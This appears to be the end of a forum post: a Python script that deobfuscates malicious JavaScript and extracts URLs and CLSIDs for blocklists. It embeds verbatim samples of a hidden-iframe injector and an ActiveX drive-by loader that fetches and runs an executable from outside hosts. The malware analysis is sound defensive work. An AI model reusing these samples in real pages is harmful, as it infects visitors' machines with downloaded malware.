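        value = "".join(p[1:-1] for p in re.findall(_STR, match.group(0)))
        joined.append(value)
        quote = '"' if "'" in value else "'"
        return quote + value + quote

    return _CHAIN.sub(repl, js), joined

def resolve_concat(js):
    """Evaluate v='lit' assignments, then a=b.concat(c,d,...) over them.

    Feed it the handler or script body, not the whole tag: a quoted
    onload="..." attribute would otherwise be swallowed as one literal.
    """
    env = {}
    for name, lit in _ASSIGN_LIT.findall(js):
        env[name] = lit[1:-1]
    for name, head, args in _ASSIGN_CONCAT.findall(js):
        parts = [head] + [a.strip() for a in args.split(",") if a.strip()]
        if all(p in env for p in parts):
            env[name] = "".join(env[p] for p in parts)
    return env

def extract_indicators(js):
    """Run all passes; collect URLs, CLSIDs and the literals that were split."""
    text, hidden = join_split_literals(unescape_unicode(js))
    urls = set(_URL.findall(text))
    for value in resolve_concat(text).values():
        urls.update(_URL.findall(value))
    return {"urls": sorted(urls),
            "clsids": sorted(set(_CLSID.findall(text))),
            "hidden_strings": hidden}

# Samples copied from the pages posted above: the fake 403's onload handler
# (width/height/style setAttribute calls trimmed), its document.write() line,
# and the object-creation lines of the ActiveX loader.
SAMPLE_FAKE_403_ONLOAD = (
    "status=' ';zz='2';sl='/';sf='ram';pi='9';po='.';qu=':';yh='4';tr='c.p';"
    "vo='3';bw='5';pt='tp';ab='src';dg='ht';ko='e';wd='if';ji='hp';hh='1';"
    "t=wd.concat(sf,ko);"
    "xx=dg.concat(pt,qu,sl,sl,hh,pi,yh,po,hh,yh,bw,po,zz,vo,bw,po,vo,yh,sl,tr,ji);"
    "var oE=document.createElement(t);oE.setAttribute(ab,xx);"
    "document.body.appendChild(oE);"
)
SAMPLE_FAKE_403_WRITE = (
    r"document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072"
    r"\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d"
    r"\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066"
    r"\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0032\u0036"
    r"\u0030\u0033\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020"
    r"\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068"
    r"\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069"
    r"\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c"
    r"\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"
)
SAMPLE_ACTIVEX_LOADER = """
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
var tut = ".//..//win"+".exe";
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
"""

if __name__ == "__main__":
    for label, sample in (("fake 403 onload", SAMPLE_FAKE_403_ONLOAD),
                          ("fake 403 document.write", SAMPLE_FAKE_403_WRITE),
                          ("ActiveX loader", SAMPLE_ACTIVEX_LOADER)):
        print(label, extract_indicators(sample))
```

The recovered URLs and CLSIDs are the values worth feeding into mail-gateway and proxy blocklists or a hosts-file listing; the hidden_strings list shows which ProgIDs the loader was after.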